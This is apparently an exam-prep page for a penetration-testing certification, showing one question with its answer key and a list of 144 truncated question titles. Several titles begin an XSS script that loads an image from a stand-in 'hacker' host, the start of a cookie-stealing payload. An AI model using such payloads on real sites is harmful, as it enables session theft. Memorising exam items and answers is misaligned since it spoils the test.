Join the discussion
Question 1/144
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?
Correct Answer: A
Adding a dependency checker into the tool chain is the best recommendation for the company that has been including vulnerable third-party modules in multiple products. A dependency checker is a tool that analyzes the dependencies of a software project and identifies any known vulnerabilities or outdated versions. This can help the developers to update or replace the vulnerable modules before deploying the products.
Add Comments
- Other Question (144q)
- Q1. A penetration tester has completed an analysis of the various software products produced b...
- Q2. During a penetration test, the domain names, IP ranges, hosts, and applications are define...
- Q3. A security analyst is conducting an unknown environment test from 192.168 3.3. The analyst...
- Q4. A software company has hired a penetration tester to perform a penetration test on a datab...
- Q5. A company becomes concerned when the security alarms are triggered during a penetration te...
- Q6. During an engagement, a penetration tester was able to upload to a server a PHP file with ...
- Q7. A penetration tester has been provided with only the public domain name and must enumerate...
- Q8. A penetration tester recently performed a social-engineering attack in which the tester fo...
- Q9. When developing a shell script intended for interpretation in Bash, the interpreter /bin/b...
- Q10. A penetration tester exploited a vulnerability on a server and remotely ran a payload to g...
- Q11. After gaining access to a Linux system with a non-privileged account, a penetration tester...
- Q12. During a penetration test, you gain access to a system with a limited user interface. This...
- Q13. A potential reason for communicating with the client point of contact during a penetration...
- Q14. Given the following code: <SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20...
- Q15. Within a Python script, a line that states print (var) outputs the following: [{'1' : 'Cen...
- Q16. A penetration tester performs several Nmap scans against the web application for a client....
- Q17. A penetration tester recently completed a review of the security of a core network device ...
- Q18. A penetration tester conducts an Nmap scan against a target and receives the following res...
- Q19. A penetration tester is exploring a client's website. The tester performs a curl command a...
- Q20. A security professional wants to test an IoT device by sending an invalid packet to a prop...
- Q21. You are a penetration tester reviewing a client's website through a web browser. INSTRUCTI...
- Q22. The following line-numbered Python code snippet is being used in reconnaissance: (Exhibit)...
- Q23. A company recruited a penetration tester to configure wireless IDS over the network. Which...
- Q24. A red team gained access to the internal network of a client during an engagement and used...
- Q25. A penetration tester has prepared the following phishing email for an upcoming penetration...
- Q26. Which of the following provides a matrix of common tactics and techniques used by attacker...
- Q27. A penetration tester is explaining the MITRE ATT&CK framework to a company's chief leg...
- Q28. A penetration tester ran a simple Python-based scanner. The following is a snippet of the ...
- Q29. Given the following code: <SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20...
- Q30. You are a security analyst tasked with hardening a web server. You have been given a list ...
- Q31. A penetration tester gains access to a system and establishes persistence, and then runs t...
- Q32. A penetration tester is enumerating shares and receives the following output: (Exhibit) Wh...
- Q33. A penetration tester runs a reconnaissance script and would like the output in a standardi...
- Q34. A penetration tester successfully performed an exploit on a host and was able to hop from ...
- Q35. A company requires that all hypervisors have the latest available patches installed. Which...
- Q36. You are a security analyst tasked with hardening a web server. You have been given a list ...
- Q37. A consultant is reviewing the following output after reports of intermittent connectivity ...
- Q38. A penetration tester is trying to restrict searches on Google to a specific domain. Which ...
- Q39. A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits...
- Q40. A penetration tester finds a PHP script used by a web application in an unprotected intern...
- Q41. A penetration tester is exploring a client's website. The tester performs a curl command a...
- Q42. A penetration tester writes the following script: (Exhibit) Which of the following is the ...
- Q43. A penetration tester exploited a vulnerability on a server and remotely ran a payload to g...
- Q44. A company hired a penetration tester to do a social-engineering test against its employees...
- Q45. The following line-numbered Python code snippet is being used in reconnaissance: (Exhibit)...
- Q46. Which of the following documents is agreed upon by all parties associated with the penetra...
- Q47. A security company has been contracted to perform a scoped insider-threat assessment to tr...
- Q48. After gaining access to a previous system, a penetration tester runs an Nmap scan against ...
- Q49. For a penetration test engagement, a security engineer decides to impersonate the IT help ...
- Q50. A penetration tester is enumerating shares and receives the following output: (Exhibit) Wh...
- Q51. You are a penetration tester reviewing a client's website through a web browser. INSTRUCTI...
- Q52. A penetration tester captured the following traffic during a web-application test: (Exhibi...
- Q53. You are a security analyst tasked with hardening a web server. You have been given a list ...
- Q54. A red team gained access to the internal network of a client during an engagement and used...
- Q55. A penetration tester wants to scan a target network without being detected by the client's...
- Q56. A tester who is performing a penetration test discovers an older firewall that is known to...
- Q57. A penetration tester finds a PHP script used by a web application in an unprotected intern...
- Q58. Which of the following can be used to store alphanumeric data that can be fed into scripts...
- Q59. SIMULATION Using the output, identify potential attack vectors that should be further inve...
- Q60. A penetration tester initiated the transfer of a large data set to verify a proof-of-conce...
- Q61. A penetration tester obtained the following results after scanning a web server using the ...
- Q62. A penetration tester wants to validate the effectiveness of a DLP product by attempting ex...
- Q63. A penetration tester is conducting a penetration test and discovers a vulnerability on a w...
- Q64. Within a Python script, a line that states print (var) outputs the following: [{'1' : 'Cen...
- Q65. Which of the following types of information would MOST likely be included in an applicatio...
- Q66. A security engineer identified a new server on the network and wants to scan the host to d...
- Q67. The following PowerShell snippet was extracted from a log of an attacker machine: (Exhibit...
- Q68. Which of the following is the BEST resource for obtaining payloads against specific networ...
- Q69. A penetration tester downloaded a Java application file from a compromised web server and ...
- Q70. A consulting company is completing the ROE during scoping. Which of the following should b...
- Q71. A new security firm is onboarding its first client. The client only allowed testing over t...
- Q72. A penetration tester writes the following script: (Exhibit) Which of the following is the ...
- Q73. A penetration tester completed an assessment, removed all artifacts and accounts created d...
- Q74. A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of th...
- Q75. During a penetration test, the domain names, IP ranges, hosts, and applications are define...
- Q76. A penetration tester conducts an Nmap scan against a target and receives the following res...
- Q77. A penetration tester is conducting an assessment on 192.168.1.112. Given the following out...
- Q78. Given the following Nmap scan command: [root@kali ~]# nmap 192.168.0 .* -- exclude 192.168...
- Q79. A penetration tester has been given eight business hours to gain access to a client's fina...
- Q80. A penetration tester is testing a new API for the company's existing services and is prepa...
- Q81. Which of the following provides an exploitation suite with payload modules that cover the ...
- Q82. A penetration tester who is performing an engagement notices a specific host is vulnerable...
- Q83. During an engagement, a penetration tester found the following list of strings inside a fi...
- Q84. A penetration tester enters a command into the shell and receives the following output: C:...
- Q85. A penetration tester performs the following command: curl -I -http2 https://www.comptia.or...
- Q86. Which of the following is the MOST important information to have on a penetration testing ...
- Q87. A penetration tester recently performed a social-engineering attack in which the tester fo...
- Q88. Which of the following BEST explains why a penetration tester cannot scan a server that wa...
- Q89. A penetration tester finds a PHP script used by a web application in an unprotected intern...
- Q90. A private investigation firm is requesting a penetration test to determine the likelihood ...
- Q91. Which of the following is a regulatory compliance standard that focuses on user privacy by...
- Q92. A penetration tester has obtained root access to a Linux-based file server and would like ...
- Q93. During the reconnaissance phase, a penetration tester obtains the following output: Reply ...
- Q94. A penetration tester has obtained a low-privilege shell on a Windows server with a default...
- Q95. A security professional wants to test an IoT device by sending an invalid packet to a prop...
- Q96. A penetration tester approaches a company employee in the smoking area and starts a conver...
- Q97. Deconfliction is necessary when the penetration test:...
- Q98. During an engagement, a penetration tester found the following list of strings inside a fi...
- Q99. A penetration tester performs the following command: curl -I -http2 https://www.comptia.or...
- Q100. The results of an Nmap scan are as follows: (Exhibit) Which of the following would be the ...
- Q101. A penetration tester requested, without express authorization, that a CVE number be assign...
- Q102. A penetration tester gains access to a system and establishes persistence, and then runs t...
- Q103. A penetration tester is examining a Class C network to identify active systems quickly. Wh...
- Q104. A penetration tester downloaded a Java application file from a compromised web server and ...
- Q105. Which of the following tools would help a penetration tester locate a file that was upload...
- Q106. A company is concerned that its cloud service provider is not adequately protecting the VM...
- Q107. The results of an Nmap scan are as follows: (Exhibit) Which of the following would be the ...
- Q108. Appending string values onto another string is called:...
- Q109. A penetration tester is performing an assessment for an application that is used by large ...
- Q110. Which of the following would MOST likely be included in the final report of a static appli...
- Q111. A penetration tester receives the following results from an Nmap scan: (Exhibit) Which of ...
- Q112. A penetration tester who is conducting a vulnerability assessment discovers that ICMP is d...
- Q113. A penetration tester, who is doing an assessment, discovers an administrator has been exfi...
- Q114. During an assessment, a penetration tester manages to exploit an LFI vulnerability and bro...
- Q115. A penetration tester has obtained shell access to a Windows host and wants to run a specia...
- Q116. A large client wants a penetration tester to scan for devices within its network that are ...
- Q117. During a penetration test, a tester is in close proximity to a corporate mobile device bel...
- Q118. After running the enum4linux.pl command, a penetration tester received the following outpu...
- Q119. A penetration tester was hired to test Wi-Fi equipment. Which of the following tools shoul...
- Q120. A penetration tester is hired to test a client's systems. The client's systems are hosted ...
- Q121. After gaining access to a Linux system with a non-privileged account, a penetration tester...
- Q122. An Nmap scan of a network switch reveals the following: (Exhibit) Which of the following t...
- Q123. A penetration tester ran a simple Python-based scanner. The following is a snippet of the ...
- Q124. A penetration tester recently completed a review of the security of a core network device ...
- Q125. A penetration tester was contracted to test a proprietary application for buffer overflow ...
- Q126. During a penetration test, a tester is able to change values in the URL from example.com/l...
- Q127. A penetration tester captured the following traffic during a web-application test: (Exhibi...
- Q128. A penetration tester captured the following traffic during a web-application test: (Exhibi...
- Q129. A mail service company has hired a penetration tester to conduct an enumeration of all use...
- Q130. A penetration tester conducts an Nmap scan against a target and receives the following res...
- Q131. You are a penetration tester reviewing a client's website through a web browser. INSTRUCTI...
- Q132. A penetration tester fuzzes an internal server looking for hidden services and application...
- Q133. A company recruited a penetration tester to configure wireless IDS over the network. Which...
- Q134. A penetration tester was contracted to test a proprietary application for buffer overflow ...
- Q135. After gaining access to a Linux system with a non-privileged account, a penetration tester...
- Q136. For a penetration test engagement, a security engineer decides to impersonate the IT help ...
- Q137. As part of an active reconnaissance, a penetration tester intercepts and analyzes network ...
- Q138. A penetration tester ran the following commands on a Windows server: (Exhibit) Which of th...
- Q139. The following PowerShell snippet was extracted from a log of an attacker machine: (Exhibit...
- Q140. Given the following code: <SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20...
- Q141. Given the following code: (Exhibit) Which of the following data structures is systems?...
- Q142. After running the enum4linux.pl command, a penetration tester received the following outpu...
- Q143. A mail service company has hired a penetration tester to conduct an enumeration of all use...
- Q144. Which of the following tools would be BEST suited to perform a manual web application secu...
